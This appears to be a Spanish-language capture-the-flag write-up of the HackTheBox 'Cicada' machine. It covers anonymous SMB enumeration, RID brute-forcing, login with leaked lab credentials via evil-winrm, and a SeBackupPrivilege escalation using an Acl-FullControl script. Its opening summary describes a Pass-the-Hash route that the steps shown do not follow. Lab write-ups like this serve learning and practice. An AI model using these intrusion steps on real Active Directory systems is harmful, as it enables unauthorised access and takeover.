write up Cicada HTB

“Cicada” es una máquina de nivel fácil en la plataforma HackTheBox. La máquina ofrece una sesión como usuario invitado mediante el servicio SMB, el cual expone una contraseña por defecto para los nuevos usuarios. Realizamos un ataque de fuerza bruta sobre el RID para descubrir posibles usuarios y encontramos uno cuya contraseña se corresponde con la filtrada en el archivo. Con este nuevo usuario, conseguimos enumerar otros usuarios en el dominio o máquina, y uno de ellos tiene una nueva contraseña filtrada en su descripción. Este usuario es capaz de acceder a un recurso compartido adicional en SMB, donde se revelan las credenciales de otro usuario. Este tercer usuario puede conectarse a la máquina víctima a través de WinRM, obteniendo así acceso inicial. Ya dentro del sistema, descubrimos que el usuario tiene habilitado el privilegio SeBackupPrivilege, lo que le permite crear copias de archivos del sistema y extraer el hash NT del usuario Administrator. Con este hash, utilizamos un ataque Pass The Hash para suplantar al usuario Administrador, logrando así el control total sobre la máquina víctima.

lo primero como siempre el escaneo de nmap:

nmap -p- --open --min-rate 5000 -sT -Pn  -n -vvv 10.10.11.35 -oG allports

nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,61563 10.10.11.35 -oN ports
# Nmap 7.94SVN scan initiated Sat Dec 14 15:11:03 2024 as: nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,61563 -oN ports 10.10.11.35
Nmap scan report for CICADA-DC (10.10.11.35)
Host is up (0.033s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-14 20:14:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
61563/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h02m59s
| smb2-time: 
|   date: 2024-12-14T20:15:03
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 14 15:12:39 2024 -- 1 IP address (1 host up) scanned in 96.41 seconds

vale vemos que no hay ninguna web tirando por detras pero por sim’ple vista vemos que se trara de un active directory de windows

por lo que para ver el nombre de la maquina y el nombre de dominio vamos a usar netexect

nxc smb 10.10.11.35

vemos que se llama CICADA-DC y cicada.htb por lo que los añadimos al /etc/hosts vale perfect

ahora vamos a verificar que exista el usuario anonmyous

nxc smb 10.10.11.35 -u 'anonmyous' -p ''

vemos que si por lo que vamos a ver a que podemos acceder con este usuario usando smbmap

smbmap -H 10.10.11.35 -u 'anonymous'

no se ve muy bien en la imagen pero tenemos acceso a HR y IPC$ si nos metemos en HR

smbclient \\\\10.10.11.35\\HR -U 'anonmyou'

vemos lo siguiente:

si nos bajamos el archivo

get "Notice from HR.txt"

dentro de el vemos esto

vemos una contraseña por lo que por ahora solo nos faltan los usuarios

podemos intentar sacarlos con fuerza bruta con netexect

nxc smb 10.10.11.35 -u 'anonmyous' -p '' --rid-brute

vemos varios usuarios. aqui o una de dos o los ponemos todos en un txt y lo usamos gunto a netexect o provamos uno a uno ( yo ya se que usuario es por lo que me salto todo esto)

y es valido con el usuario michael

ahora si enumeramos los usuarios con este usuario encontramos algo curioso

vemos que el usuario david.orelious en su descripcion tiene la contraseña por lo que mas facil para mi

una vez echo podemos ver a que tiene acceso este usuario david.orelious con smbmap

smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'

vemos que tenemos acceso a mas directorios el mas interesante es el DEV por lo que vamos a ir a ese

smbclient \\\\10.10.11.35\\DEV -U 'david.orelious'

vemos un archivo .ps1 nos lo bajamos y vemos que hay dentro

y otra vez vemos credenciales y ademas se una usuaria a la cual la podemos hacer un evil-winrm

por lo que

evil-winrm -i 10.10.11.35  -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

estamos dentro

root

vemo que tenemos privilegio sobre los backups lo cual se puede explotar para que nos deje acceder a cualquier directorio https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

por lo que vamos a usar este exploit https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1?source=post_page—–83ddcc0db5c7——————————–

lo subimos con python y una vez subido ejecutamos

. .\esc.ps1

y seguido podemos hacer el siguiente comando

Acl-FullControl -user cicada\emily.oscars -path C:\users\administrator\desktop

y conseguimos el acceso